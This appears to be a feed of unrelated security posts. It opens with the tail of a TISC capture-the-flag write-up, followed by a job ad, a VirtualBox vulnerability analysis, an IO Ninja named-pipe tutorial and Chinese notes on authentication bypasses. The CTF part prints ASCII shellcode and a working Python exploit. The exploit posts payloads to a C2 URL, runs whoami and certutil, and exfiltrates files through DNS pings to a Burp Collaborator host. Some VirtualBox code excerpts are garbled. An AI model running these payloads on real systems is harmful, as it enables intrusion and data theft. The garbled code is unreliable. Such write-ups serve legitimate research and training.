        "       xor     edi, dword ptr [ebx];",                 # dereference IAT, get GetModuleHandle in edi       
        "       push    esi;",                                  # nulls for end of wide string
        "       push    0x01330132;",                           # push widestring "kernel32"
        "       xor     dword ptr [esp], eax;",
        "       push    0x016d0164;",                   
        "       xor     dword ptr [esp], eax;",
        "       push    0x016f0173;",                   
        "       xor     dword ptr [esp], eax;",
        "       push    0x0164016a;",                   
        "       xor     dword ptr [esp], eax;",
        "       push    esp;",
        "       call    edi;",                                  # call GetModuleHandleW(&"kernel32")
        "       push    eax;",                                  # Kernel32 base address in eax
        "       pop     edi;",
        "       push    esi;",                                  # null bytes
        "       pop     ebx;",
        "       xor     ebx, dword ptr [edi + 0x3C];",          # ebx = [kernel32 + 0x3C] = offset(PE header)
        "       push    ebx;",                                  # null out bytes on top of stack
        "       xor     ebx, dword ptr [esp];",
        "       pop     eax;",
        "       xor     ebx, dword ptr [edi + eax + 0x78];",    # ebx = [PE32 optional header + offset(PE32 export table offset)] = offset(export table)
        "       xor     esi, dword ptr [edi + ebx + 0x20];",    # esi = [kernel32 + offset(export table) + 0x20] = offset(names table)
        "       push    edi;",
        "       add     esi, dword ptr [esp];",                 # esi = kernel32 + offset(names table) = &(names table)
        "       xor     dword ptr [esp], edi;",                 # null out value on stack
        "       pop     edx             ;",         
        "       xor     edx, [edi + ebx + 0x24];",              # edx = [kernel32 + offset(export table) + 0x24] = offset(ordinals table)
        push_string("WinE"),
        "       pop ecx;",                                      # ecx = 'WinE'
        "   find_winexec_x86:"
        "       push    ebp;",
        "       xor     dword ptr [esp], ebp;",                 # null out bytes on top of stack
        "       and     ebp, dword ptr [esp];",                 # nulls out ebp for xor operation
        "       xor     BP, WORD ptr [edi + edx];",             # ebp = [kernel32 + offset(ordinals table) + offset] = function ordinal
        "       inc     edx;",
        "       inc     edx;",                                  # edx = offset += 2
        "       lodsd;",                                        # eax = &(names table[function number]) = offset(function name)
        "       cmp     [edi + eax], ecx;"                      # *(dword*)(function name) == "WinE" ?
        "       jne     find_winexec_x86;",
        "       pop     esi;",
        "       xor     esi, dword ptr [edi + ebx + 0x1C];"     # esi = [kernel32 + offset(export table) + 0x1C] = offset(address table)] = offset(address table)
        "       push    edi;",
        "       add     esi, dword ptr [esp];",                 # esi = kernel32 + offset(address table) = &(address table)
        "       push    ebp;",
        "       add     ebp, dword ptr [esp];",
        "       add     edi, [esi + ebp * 2];",                 # edi = kernel32 + [&(address table)[WinExec ordinal]] = offset(WinExec) = &(WinExec)
        "       push    0x31;",                                 # null out eax
        "       pop     eax;",
        "       xor     al, 0x31;",
        "       push    eax;",                                  # nulls
        push_string(padded_command),                            # set up args for WinExec
        "       push    esp;",
        "       pop     ebx;",
        "       inc     eax;",
        "       push    eax;",
        "       push    ebx;",
        "       inc     ecx;",                                  # NOP
        "       inc     ecx;",                                  # NOP
        "       call    edi;",                                  # WinExec(&("calc"), 1);
    ]
    return "\n".join(asm)

## o2r7vffpq263v6rrjsyxq4xp7gd61v.burpcollaborator.net
COLLABORATOR_INSTANCE = "o2r7vffpq263v6rrjsyxq4xp7gd61v"
FILE_NAME = "1_run_uwu1.bat"
BANNED_CHARS = ['%', '&', '+']
C2_URL = 'http://<IP ADDRESS>:18080/send.php'
TARGET_UWUID = '715cf1a6-51de-4a55-be11-c0ffeec0ffee'
WORKING_FILE = 'l'


def send_command(command):
    for banned_char in BANNED_CHARS:
        if banned_char in command:
            print("Banned chars detected in command!")
            exit(1)

    print("[+] Sending command: {}".format(command))

    shellcode = ascii_shellcode(command)
    eng = ks.Ks(ks.KS_ARCH_X86, ks.KS_MODE_32)
    encoding, _ = eng.asm(shellcode)
    payload_string = ""
    payload = b'UwU' 
    payload += b'A' * 29 
    payload += pack("<L", (0x41410679)) + pack("<L", (0x55756e78)) 
    payload += bytes(encoding) 
    payload += b"A" * (328 - len(payload))
    payload = payload.replace(b'\xff\xd7', b'\x7f\x57').replace(b'\x8b', b'\x0b').replace(b'\xfe', b'\x7e').replace(b'\xb7', b'\x37').replace(b'\xad', b'\x2d').replace(b'\xee', b'\x6e').replace(b'\xae', b'\x2e').replace(b'\xed', b'\x6d')
    for enc in payload:
        payload_string += "%{0:02x}".format(enc)

    payload_string = payload_string.replace("%ff%d7", "%7f%57").replace("%8b","%0b").replace("%fe","%7e").replace("%b7","%37").replace("%ad","%2d").replace("%ee","%6e").replace("%ae","%2e").replace("%ed", "%6d")

    headers = {
        'User-Agent': 'UwUserAgent/1.0'
    }

    requests.post(C2_URL, headers=headers, data={'action': 'send', 'a': '715cf1a6-51de-4a55-be11-c0ffeec0ffee', 'b': payload})
    sleep(5)

def exfil_working_file():
    send_command("powershell Add-Content {} .{}. -NoNewLine".format(WORKING_FILE, COLLABORATOR_INSTANCE))
    send_command("powershell Add-Content {} burpcollaborator.net -NoNewLine".format(WORKING_FILE))
    send_command("powershell ping $(type {})".format(WORKING_FILE))
    delete_file(WORKING_FILE)

def delete_file(filename):
    send_command('powershell del {}'.format(filename))
    
def get_file_length(filename):
    send_command("powershell \"Add-Content {} $(Get-Content {}).length -NoNewLine\"".format(WORKING_FILE, filename))
    exfil_working_file()

def exfil_file(filename):
    base64_file = "e"
    block_size = 50

    # delete base64 file
    delete_file(base64_file)

    # create base64 file
    send_command("certutil -encodehex -f {} {} 0x40000001".format(filename, base64_file))

    # get base64 file length
    get_file_length(base64_file)
    file_length = int(input("[*] Enter received base64 file length: "))

    # replace non-DNS compliant chars
    send_command("powershell \"(Get-Content {}).replace([char]43, '-') | Set-Content {}\"".format(base64_file, base64_file))
    send_command("powershell \"(Get-Content {}).replace('/', '.') | Set-Content {}\"".format(base64_file, base64_file))
    send_command("powershell \"(Get-Content {}).replace('=', '') | Set-Content {}\"".format(base64_file, base64_file))

    offset = 0
    while offset < file_length:
        print("[+] Exfiltrating offset {} in file {}".format(offset, filename))
        # Add offset at front and back to prevent .. error and also to ensure that all blocks are received
        send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
        if (offset + block_size) > file_length:
            send_command("powershell \"Add-Content {} $(Get-Content {}).substring({},{}) -NoNewLine\"".format(WORKING_FILE, base64_file, offset, file_length - offset - 1))
        else:
            send_command("powershell \"Add-Content {} $(Get-Content {}).substring({},{}) -NoNewLine\"".format(WORKING_FILE, base64_file, offset, block_size))
        send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
        offset += block_size

        exfil_working_file()

## if any blocks were dropped previously
def exfil_lost_block(filename, offset, length):
    print("[+] Exfiltrating offset {} in file {}".format(offset, filename))
    send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
    send_command("powershell \"Add-Content {} $(Get-Content {}).substring({},{}) -NoNewLine\"".format(WORKING_FILE, filename, offset, length))
    send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
    exfil_working_file()

## MicrosoftWindowsVersion10.0.14393
def get_version():
    version_file = 'v'
    send_command("cmd /c \"ver > {}\"".format(version_file))
    send_command("powershell \"(Get-Content {}).replace(' ', '') | Set-Content {}\"".format(version_file, version_file))
    send_command("powershell \"(Get-Content {}).replace('[', '') | Set-Content {}\"".format(version_file, version_file))
    send_command("powershell \"(Get-Content {}).replace(']', '') | Set-Content {}\"".format(version_file, version_file))
    send_command("powershell \"(Get-Content {})[1] | Set-Content {} -NoNewLine\"".format(version_file, version_file))
    send_command("powershell \"Add-Content {} $(Get-Content {}) -NoNewLine\"".format(WORKING_FILE, version_file))
    exfil_working_file()

## ec2amaz-9ri345e\administrator
def get_user():
    user_file = 'v'
    send_command("cmd /c \"whoami > {}\"".format(user_file))
    send_command("powershell \"(Get-Content {}).replace('\\', '') | Set-Content {} -NoNewLine\"".format(user_file, user_file))
    send_command("powershell \"Add-Content {} $(Get-Content {}) -NoNewLine\"".format(WORKING_FILE, user_file))
    exfil_working_file()

## C:\Users\Administrator\AppData\LocalLow
def get_pwd():
    send_command("cmd /c \"cd > {}\"".format(WORKING_FILE))
    send_command("powershell \"(Get-Content {}).replace(':', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    send_command("powershell \"(Get-Content {}).replace('\\', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    send_command("powershell \"(Get-Content {}).replace(' ', '.') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    exfil_working_file()

## Microsoft
## Temp
## 1_run_uwu1.bat
def get_file_name(index):
    send_command("powershell \"Add-Content {} $(ls)[{}].Name -NoNewLine\"".format(WORKING_FILE, index))
    send_command("powershell \"(Get-Content {}).replace('_', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    exfil_working_file()
    

def exfil_final_uwu():
    delete_file("c")
    delete_file("x")
    delete_file("y")
    send_command("cmd /c \"echo ^4 > c\"")
    send_command("cmd /c \"echo ^5 >> c\"")
    send_command("cmd /c \"type c | cmd /c final_uwu_with_flag.exe > x\"")
    sleep(3)        # more time to play UwU sound
    send_command("powershell \"Select-String -Path x -Pattern TISC|Out-File y\"")       # save more time
    exfil_file("y")

if __name__ == "__main__":
    delete_file(WORKING_FILE)
    # get_user()
    # get_pwd()
    # get_file_name(2)
    # exfil_file('1_run_uwu1.bat')
    # exfil_lost_block('e', 120, 30)
    # exfil_lost_block('e', 330, 13)
    # exfil_lost_block('y', 25, 25)
    exfil_final_uwu()

Interestingly, this turned out to be an unintended solution as I was meant to rely purely on the shellcode to transmit the flag via the UwU.exe messaging functions. I had considered this route earlier but decided that it would be too troublesome to set up the call stack. Fortunately, life found a way.

TISC{UwU_m@lwArez_4_uWuuUU!}

Conclusion

After two weeks of intense puzzle solving, I finished all 10 levels, claiming $25,000 for charity as one other participant had completed level 8. CSIT kindly donated the prize money to The Community Chest on my behalf. I got lots of practice exploiting a broad range of targets and crafted my own ASCII-only Windows WinExec shellcode that could be reused for future exploits. It was a trial by fire that gave me more confidence to tackle new CTF domains such as steganography, forensics, and pwn. Many of the later challenges featured twists that forced me to “try harder” beyond existing writeups and conduct my own original research. If I could award prizes to challenges, they would be:

Most Hardcore: Malware for UwU
Best Storyline: 1865 Text Adventure
Biggest Headache: Get-Shwifty
Most Dynamic: The Secret
Biggest Haystack: Knock Knock, Who’s There
Smallest Needle: Need for Speed
Smallest Payload: The Magician's Den
Most Likely to Make Me Guess: Needle in a Greystack
Most Enraging: Dee Na Saw as a need
Most Parts: Scratching the Surface

Thank you TISC organising team for a great challenge!

Results

Join Us

THALIUM

1 November 2021 at 00:00

Offres Thalium Dans le cadre de nos travaux R&D ou pour nos besoins clients, l’équipe Thalium développe son expertise autour des domaines suivants : Recherche et exploitation de vulnérabilités Fuzzing Développements kernel / userland Connaissance de la menace et investigation numérique Et ce sur de multiples plateformes : Windows, Linux, macOS Android, iOS, IOT Intel, ARM Pour répondre aux challenges de plus en plus nombreux, nous recherchons continuellement de nouveaux experts pour nos équipes Reverse, Développements ou encore Forensics.

GSOh No! Hunting for Vulnerabilities in VirtualBox Network Offloads

SentinelLabs

Max Van Amerongen

23 November 2021 at 11:56

Introduction

The Pwn2Own contest is like Christmas for me. It’s an exciting competition which involves rummaging around to find critical vulnerabilities in the most commonly used (and often the most difficult) software in the world. Back in March, I was preparing to have a pop at the Vancouver contest and had decided to take a break from writing browser fuzzers to try something different: VirtualBox.

Virtualization is an incredibly interesting target. The complexity involved in both emulating hardware devices and passing data safely to real hardware is astounding. And as the mantra goes: where there is complexity, there are bugs.

For Pwn2Own, it was a safe bet to target an emulated component. In my eyes, network hardware emulation seemed like the right (and usual) route to go. I started with a default component: the NAT emulation code in /src/VBox/Devices/Network/DrvNAT.cpp.

At the time, I just wanted to get a feel for the code, so there was no specific methodical approach to this other than scrolling through the file and reading various parts.

During my scrolling adventure, I landed on something that caught my eye:

static DECLCALLBACK(void) drvNATSendWorker(PDRVNAT pThis, PPDMSCATTERGATHER pSgBuf)
{
#if 0 /* Assertion happens often to me after resuming a VM -- no time to investigate this now. */
   Assert(pThis->enmLinkState == PDMNETWORKLINKSTATE_UP);
#endif
   if (pThis->enmLinkState == PDMNETWORKLINKSTATE_UP)
   {
       struct mbuf *m = (struct mbuf *)pSgBuf->pvAllocator;
       if (m)
       {
           /*
            * A normal frame.
            */
           pSgBuf->pvAllocator = NULL;
           slirp_input(pThis->pNATState, m, pSgBuf->cbUsed);
       }
       else
       {
           /*
            * GSO frame, need to segment it.
            */
           /** @todo Make the NAT engine grok large frames?  Could be more efficient... */
#if 0 /* this is for testing PDMNetGsoCarveSegmentQD. */
           uint8_t         abHdrScratch[256];
#endif
           uint8_t const  *pbFrame = (uint8_t const *)pSgBuf->aSegs[0].pvSeg;
           PCPDMNETWORKGSO pGso    = (PCPDMNETWORKGSO)pSgBuf->pvUser;
           uint32_t const  cSegs   = PDMNetGsoCalcSegmentCount(pGso, pSgBuf->cbUsed);  Assert(cSegs > 1);
           for (uint32_t iSeg = 0; iSeg pNATState, pGso->cbHdrsTotal + pGso->cbMaxSeg, &pvSeg, &cbSeg);
               if (!m)
                   break;
 
#if 1
               uint32_t cbPayload, cbHdrs;
               uint32_t offPayload = PDMNetGsoCarveSegment(pGso, pbFrame, pSgBuf->cbUsed,
                                                           iSeg, cSegs, (uint8_t *)pvSeg, &cbHdrs, &cbPayload);
               memcpy((uint8_t *)pvSeg + cbHdrs, pbFrame + offPayload, cbPayload);
 
               slirp_input(pThis->pNATState, m, cbPayload + cbHdrs);
#else
...

The function used for sending packets from the guest to the network contained a separate code path for Generic Segmentation Offload (GSO) frames and was using memcpy to combine pieces of data.

The next question was of course “How much of this can I control?” and after going through various code paths and writing a simple Python-based constraint solver for all the limiting factors, the answer was “More than I expected” when using the Paravirtualization Network device called VirtIO.

Paravirtualized Networking

An alternative to fully emulating a device is to use paravirtualization. Unlike full virtualization, in which the guest is entirely unaware that it is a guest, paravirtualization has the guest install drivers that are aware that they are running in a guest machine in order to work with the host to transfer data in a much faster and more efficient manner.

VirtIO is an interface that can be used to develop paravirtualized drivers. One such driver is virtio-net, which comes with the Linux source and is used for networking. VirtualBox, like a number of other virtualization software, supports this as a network adapter:

Similarly to the e1000, VirtIO networking works by using ring buffers to transfer data between the guest and the host (In this case called Virtqueues, or VQueues). However, unlike the e1000, VirtIO doesn’t use a single ring with head and tail registers for transmitting but instead uses three separate arrays:

A Descriptor array that contains the following data per-descriptor:
- Address – The physical address of the data being transferred.
- Length – The length of data at the address.
- Flags – Flags that determine whether the Next field is in-use and whether the buffer is read or write.
- Next – Used when there is chaining.
An Available ring – An array that contains indexes into the Descriptor array that are in use and can be read by the host.
A Used ring – An array of indexes into the Descriptor array that have been read by the host.

This looks as so:

When the guest wishes to send packets to the network, it adds an entry to the descriptor table, adds the index of this descriptor to the Available ring, and then increments the Available Index pointer:

Once this is done, the guest ‘kicks’ the host by writing the VQueue index to the Queue Notify register. This triggers the host to begin handling descriptors in the available ring. Once a descriptor has been processed, it is added to the Used ring and the Used Index is incremented:

Generic Segmentation Offload

Next, some background on GSO is required. To understand the need for GSO, it’s important to understand the problem that it solves for network cards.

Originally the CPU would handle all of the heavy lifting when calculating transport layer checksums or segmenting them into smaller ethernet packet sizes. Since this process can be quite slow when dealing with a lot of outgoing network traffic, hardware manufacturers started implementing offloading for these operations, thus removing the strain on the operating system.

For segmentation, this meant that instead of the OS having to pass a number of much smaller packets through the network stack, the OS just passes a single packet once.

It was noticed that this optimization could be applied to other protocols (beyond TCP and UDP) without the need of hardware support by delaying segmentation until just before the network driver receives the message. This resulted in GSO being created.

Since VirtIO is a paravirtualized device, the driver is aware that it is in a guest machine and so GSO can be applied between the guest and host. GSO is implemented in VirtIO by adding a context descriptor header to the start of the network buffer. This header can be seen in the following struct:

struct VNetHdr
{
   uint8_t  u8Flags;
   uint8_t  u8GSOType;
   uint16_t u16HdrLen;
   uint16_t u16GSOSize;
   uint16_t u16CSumStart;
   uint16_t u16CSumOffset;
};

The VirtIO header can be thought of as a similar concept to the Context Descriptor in e1000.

When this header is received, the parameters are verified for some level of validity in vnetR3ReadHeader. Then the function vnetR3SetupGsoCtx is used to fill the standard GSO struct used by VirtualBox across all network devices:

typedef struct PDMNETWORKGSO
{
   /** The type of segmentation offloading we're performing (PDMNETWORKGSOTYPE). */
   uint8_t             u8Type;
   /** The total header size. */
   uint8_t             cbHdrsTotal;
   /** The max segment size (MSS) to apply. */
   uint16_t            cbMaxSeg;
 
   /** Offset of the first header (IPv4 / IPv6).  0 if not not needed. */
   uint8_t             offHdr1;
   /** Offset of the second header (TCP / UDP).  0 if not not needed. */
   uint8_t             offHdr2;
   /** The header size used for segmentation (equal to offHdr2 in UFO). */
   uint8_t             cbHdrsSeg;
   /** Unused. */
   uint8_t             u8Unused;
} PDMNETWORKGSO;

Once this has been constructed, the VirtIO code creates a scatter-gatherer to assemble the frame from the various descriptors:

          /* Assemble a complete frame. */
               for (unsigned int i = 1; i  0; i++)
               {
                   unsigned int cbSegment = RT_MIN(uSize, elem.aSegsOut[i].cb);
                   PDMDevHlpPhysRead(pDevIns, elem.aSegsOut[i].addr,
                    
                                     ((uint8_t*)pSgBuf->aSegs[0].pvSeg) + uOffset,
                                     cbSegment);
                   uOffset += cbSegment;
                   uSize -= cbSegment;
               }

The frame is passed to the NAT code along with the new GSO structure, reaching the point that drew my interest originally.

Vulnerability Analysis

CVE-2021-2145 – Oracle VirtualBox NAT Integer Underflow Privilege Escalation Vulnerability

When the NAT code receives the GSO frame, it gets the full ethernet packet and passes it to Slirp (a library for TCP/IP emulation) as an mbuf message. In order to do this, VirtualBox allocates a new mbuf message and copies the packet to it. The allocation function takes a size and picks the next largest allocation size from three distinct buckets:

MCLBYTES (0x800 bytes)
MJUM9BYTES (0x2400 bytes)
MJUM16BYTES (0x4000 bytes)

struct mbuf *slirp_ext_m_get(PNATState pData, size_t cbMin, void **ppvBuf, size_t *pcbBuf)
{
   struct mbuf *m;
   int size = MCLBYTES;
   LogFlowFunc(("ENTER: cbMin:%d, ppvBuf:%p, pcbBuf:%p\n", cbMin, ppvBuf, pcbBuf));
 
   if (cbMin 
If the supplied size is larger than MJUM16BYTES, an assertion is triggered. Unfortunately, this assertion is only compiled when the RT_STRICT macro is used, which is not the case in release builds. This means that execution will continue after this assertion is hit, resulting in a bucket size of 0x800 being selected for the allocation. Since the actual data size is larger, this results in a heap overflow when the user data is copied into the mbuf.
/** @def AssertMsgFailed
* An assertion failed print a message and a hit breakpoint.
*
* @param   a   printf argument list (in parenthesis).
*/
#ifdef RT_STRICT
# define AssertMsgFailed(a)  \
   do { \
       RTAssertMsg1Weak((const char *)0, __LINE__, __FILE__, RT_GCC_EXTENSION __PRETTY_FUNCTION__); \
       RTAssertMsg2Weak a; \
       RTAssertPanic(); \
   } while (0)
#else
# define AssertMsgFailed(a)     do { } while (0)
#endif

CVE-2021-2310 - Oracle VirtualBox NAT Heap-based Buffer Overflow Privilege Escalation Vulnerability
Throughout the code, a function called PDMNetGsoIsValid is used which verifies whether the GSO parameters supplied by the guest are valid. However, whenever it is used it is placed in an assertion. For example:
DECLINLINE(uint32_t) PDMNetGsoCalcSegmentCount(PCPDMNETWORKGSO pGso, size_t cbFrame)
{
   size_t cbPayload;
   Assert(PDMNetGsoIsValid(pGso, sizeof(*pGso), cbFrame));
   cbPayload = cbFrame - pGso->cbHdrsSeg;
   return (uint32_t)((cbPayload + pGso->cbMaxSeg - 1) / pGso->cbMaxSeg);
}

As mentioned before, assertions like these are not compiled in the release build. This results in invalid GSO parameters being allowed; a miscalculation can be caused for the size given to slirp_ext_m_get, making it less than the total copied amount by the memcpy in the for-loop. In my proof-of-concept, my parameters for the calculation of pGso->cbHdrsTotal + pGso->cbMaxSeg used for cbMin resulted in an allocation of 0x4000 bytes, but the calculation for cbPayload resulted in a memcpy call for 0x4065 bytes, overflowing the allocated region.
CVE-2021-2442 - Oracle VirtualBox NAT UDP Header Out-of-Bounds
The title of this post makes it seem like GSO is the only vulnerable offload mechanism in place here; however, another offload mechanism is vulnerable too: Checksum Offload.
Checksum offloading can be applied to various protocols that have checksums in their message headers. When emulating, VirtualBox supports this for both TCP and UDP.
In order to access this feature, the GSO frame needs to have the first bit of the u8Flags member set to indicate that the checksum offload is required. In the case of VirtualBox, this bit must always be set since it cannot handle GSO without performing the checksum offload. When VirtualBox handles UDP packets with GSO, it can end up in the function PDMNetGsoCarveSegmentQD in certain circumstances:
       case PDMNETWORKGSOTYPE_IPV4_UDP:
           if (iSeg == 0)
               pdmNetGsoUpdateUdpHdrUfo(RTNetIPv4PseudoChecksum((PRTNETIPV4)&pbFrame[pGso->offHdr1]),
                                        pbSegHdrs, pbFrame, pGso->offHdr2);

The function pdmNetGsoUpdateUdpHdrUfo uses the offHdr2 to indicate where the UDP header is in the packet structure. Eventually this leads to a function called RTNetUDPChecksum:
RTDECL(uint16_t) RTNetUDPChecksum(uint32_t u32Sum, PCRTNETUDP pUdpHdr)
{
   bool fOdd;
   u32Sum = rtNetIPv4AddUDPChecksum(pUdpHdr, u32Sum);
   fOdd = false;
   u32Sum = rtNetIPv4AddDataChecksum(pUdpHdr + 1, RT_BE2H_U16(pUdpHdr->uh_ulen) - sizeof(*pUdpHdr), u32Sum, &fOdd);
   return rtNetIPv4FinalizeChecksum(u32Sum);
}

This is where the vulnerability is. In this function, the uh_ulen property is completely trusted without any validation, which results in either a size that is outside of the bounds of the buffer, or an integer underflow from the subtraction of sizeof(*pUdpHdr).
rtNetIPv4AddDataChecksum receives both the size value and the packet header pointer and proceeds to calculate the checksum:
   /* iterate the data. */
   while (cbData > 1)
   {
       u32Sum += *pw;
       pw++;
       cbData -= 2;
   }

From an exploitation perspective, adding large amounts of out of bounds data together may not seem particularly interesting. However, if the attacker is able to re-allocate the same heap location for consecutive UDP packets with the UDP size parameter being added two bytes at a time, it is possible to calculate the difference in each checksum and disclose the out of bounds data.
On top of this, it’s also possible to use this vulnerability to cause a denial-of-service against other VMs in the network:

Got another Virtualbox vuln fixed (CVE-2021-2442)
Works as both an OOB read in the host process, as well as an integer underflow. In some instances, it can also be used to remotely DoS other Virtualbox VMs! pic.twitter.com/Ir9YQgdZQ7
— maxpl0it (@maxpl0it) August 1, 2021

 
Outro
Offload support is commonplace in modern network devices so it’s only natural that virtualization software emulating devices does it as well. While most public research has been focused on their main components, such as ring buffers, offloads don’t appear to have had as much scrutiny. Unfortunately in this case I didn’t manage to get an exploit together in time for the Pwn2Own contest, so I ended up reporting the first two to the Zero Day Initiative and the checksum bug to Oracle directly.

MindShaRE: Using IO Ninja to Analyze NPFS

Zero Day Initiative - Blog

Michael DePlante

18 November 2021 at 17:14

In this installment of our MindShaRE series, ZDI vulnerability researcher Michael DePlante describes how he uses the IO Ninja tool for reverse engineering and software analysis. According to its website, IO Ninja provides an “all-in-one terminal emulator, sniffer, and protocol analyzer.” The tool provides many options for researchers but can leave new users confused about where to begin. This blog provides a starting point for some of the most commonly used features.

Looking at a new target can almost feel like meeting up with someone who’s selling their old car. I’m the type of person who would want to inspect the car for rust, rot, modifications, and other red flags before I waste the owner’s or my own time with a test drive. If the car isn’t super old, having an OBD reader (on-board diagnostics) may save you some time and money. After the initial inspection, a test drive can be critical to your decision.

Much like checking out a used car, taking software for test drives as a researcher with the right tools is a wonderful way to find issues. In this blog post, I would like to highlight a tool that I have found incredibly handy to have in my lab – IO Ninja.

Lately, I have been interested in antivirus products, mainly looking for local privilege escalation vulnerabilities. After looking at several vendors including Avira, Bitdefender, ESET, Panda Security, Trend Micro, McAfee, and more, I started to notice that almost all of them utilize the Named Pipe Filesystem (NPFS). Furthermore, NPFS is used in many other product categories including virtualization, SCADA, license managers/updaters, etc.

I began doing some research and realized there were not many tools that let you locally sniff and connect to these named pipes easily in Windows. The Sysinternals suite has a tool called Pipelist and it works exactly as advertised. Pipelist can enumerate open pipes at runtime but can leave you in the dark about pipe connections that are opening and closing frequently. Another tool also in the Sysinternals suite called Process Explorer allows you to view open pipes but only shows them when you are actively monitoring a given process. IO Ninja fills the void with two great plugins it offers.

An Introduction to IO Ninja

When you fire up IO Ninja and start a new session, you’re presented with an expansive list of plugins as shown below. I will be focusing on two of the plugins under the “File Systems” section in this blog: Pipe Monitor and Pipe Server.

Before starting a new session, you may need to check the “Run as Administrator” box if the pipes you want to interact with require elevated privileges to read or write. You can inspect the permissions on a given pipe with the accesschk tool from the Sysinternals Suite:

The powerful Pipe Monitor plugin in IO Ninja allows you to record communication, as well as apply filters to the log. The Pipe Server plugin allows you to connect to the client side of a pipe.

IO Ninja: Pipe Monitor

The following screenshot provides a look at the Pipe Monitor plugin that comes by default with IO Ninja.

In the above screenshot, I added a process filter (*chrome*) and started recording before I opened the application. You can also filter on a filename ( name of the pipe), PID, or file ID. After starting Chrome, data started flowing between several pipe instances. This is a terrific way to dynamically gather an understanding of what data is going through each pipe and when those pipes are opened and closed. I found this helpful when interacting with antivirus agents and wanted to know what pipes were being opened or closed based on certain actions from the user, such as performing a system scan or update. It can also be interesting to see the content going across the pipe, especially if it contains sensitive data and the pipe has a weak ACL.

It can also help a developer debug an application and find issues in real-time like unanswered pipe connections or permission issues as shown below.

Using IO Ninja’s find text/bin feature to search for “cannot find”, I was able to identify several connections in the log below where the client side of a connection could not find the server side. In my experience, many applications make these unanswered connections out of the box.

What made this interesting was that the process updatesrv.exe, running as NT AUTHORITY\SYSTEM, tried to open the client side of a named pipe but failed with ERROR_FILE_NOT_FOUND. We can fill the void by creating our own server with the name it is looking for and then triggering the client connection by initiating an update within the user interface.

As a low privileged user, I am now able to send arbitrary data to a highly privileged process using the Pipe Server plugin. This could potentially result in a privilege escalation vulnerability, depending on how the privileged process handles the data I am sending it.

IO Ninja: Pipe Server

The Pipe Server plugin is powerful as it allows you to send data to specific client connections from the server side of a pipe. The GUI in IO Ninja allows you to select which conversation you’d like to interact with by selecting from a drop-down list of Client IDs. Just like with the Pipe Monitor plugin, you can apply filters to clean up the log. Below you’ll find a visual from the Pipe Server plugin after starting the server end of a pipe and getting a few client connections.

In the bottom right of the previous image, you can see the handy packet library. Other related IO Ninja features include a built-in hex editor, file- and script-based transmission, and packet templating via the packet template editor.

The packet template editor allows you to create packet fields and script custom actions using the Ja nc y scripting language. Fields are visualized in the property grid as shown above on the bottom left-hand side of the image, where they can be edited. This feature makes it significantly easier to create and modify packets when compared to just using a hex editor.

Conclusion

This post only scratches the surface of what IO Ninja can do by highlighting just two of the plugins offered. The tool is scriptable and provides an IDE that encourages users to build, extend or modify existing plugins. The plugins are open source and available in a link listed at the end of the blog. I hope that this post inspires you to take a closer look at NPFS as well as the IO Ninja tool and the other plugins it offers.

Keep an eye out for future blogs where I will go into more detail on vulnerabilities I have found in this area. Until then, you can follow me @izobashi and the team @th ezd i on Twitter for the latest in exploit techniques and security patches.

Additional information about IO Ninja can be found on their website. All of IO Ninja’s plugins are open source and available here.

Additional References

If you are interested in learning more you can also check out the following resources which I found helpful.

Microsoft - Documentation: Named Pipes

Gil Cohen - Call the plumber: You have a leak in your named pipe

0xcsandker - Offensive Windows IPC Internals 1: Named Pipes

MindShaRE: Using IO Ninja to Analyze NPFS

Identity Security Authentication Vulnerability

Noah Lab

Skay

18 November 2021 at 13:48

Identity Security Authentication Vulnerability

拿到一个系统大多很多情况下只有一个登录入口，如果想进一步得到较为高危的漏洞，只能去寻找权限校验相关的漏洞，再结合后台洞，最终得到一个较为满意的漏洞。

这里列出一些较为常见的安全认证配置：

Spring Security
Apache Shiro
服务器本身(Tomcat、Nginx、Apache）401 认证
Tomcat 安全认证(结合web.xml) 无需代码实现
JSON Web Token

以上只是简单列出了一些笔者见过常见的安全认证配置组件。不同的鉴权组件存在异同的审计思路。

一、寻找未授权

这是笔者第首先会入手去看的点，毕竟如果能直接从未授权的点进入，就没必要硬刚鉴权逻辑了。

1.一些第三方组件大概率为未授权应用

druid、webservice、swagger等内置于程序中的应用大多被开发者设计为无需权限校验接口。

Identity Security Authentication Vulnerability

第三方组件本身又存在历史漏洞，且以jar包的形式内置于应用中，低版本的情况很常见。

利用druid的未授权获取了管理员session

Identity Security Authentication Vulnerability

2.安全认证框架配置中存在的未授权接口

出于某种功能需求，开发者会讲一些功能接口配置无需权限

web.xml

细心查看配置文件中各个Filter、Servlet、Listener ，可能有意想不到的收获

Identity Security Authentication Vulnerability

spring-mvc.xml

这里是以拦截器的方式对外开放了未授权请求处理

Identity Security Authentication Vulnerability

tomcat 安全配置

Identity Security Authentication Vulnerability

配置类

Apache Shiro、Spring Security等支持以@Configuare注解方式配置权限认证，只要按照配置去寻找，当然以上框架也支持配置文件方式配置，寻找思路一样

Identity Security Authentication Vulnerability

3.未授权访问接口配合ssrf获取localhost本身需鉴权服务

一些多服务组件中，存在服务之间的相互调用，服务之间的相互调用或许不需要身份校验，或者已经配置了静态的身份凭证，又或者通过访问者IP是否为127.0.0.1来进行鉴权。这时我们需要一个SSRF漏洞即可绕过权限验证。

很经典的为Apache Module mod_proxy 场景绕过：SSRF CVE-2021-4043.

二、安全认证框架本身存在鉴权漏洞

1.Apache Shiro

Shiro相关的权限绕过漏洞，我觉得可以归类到下面的路径归一化的问题上

2.Spring Security

某些配置下，存在权限绕过，当配置文件放行了/**/.js 时

Identity Security Authentication Vulnerability

3.JWT 存在的安全风险

敏感信息泄露
未校验签名
签名算法可被修改为none
签名密钥爆破
修改非对称密码算法为对称密码算法
伪造密钥(CVE-2018-0114)

jwt测试工具：https://github.com/ticarpi/jwt_tool

三、静态资源访问

静态资源css、js等文件访问往往不需要权限，开发者可能讲鉴权逻辑放在Filter里，当我们在原有路由基础上添加.js 后缀时，即可绕过验证

Identity Security Authentication Vulnerability

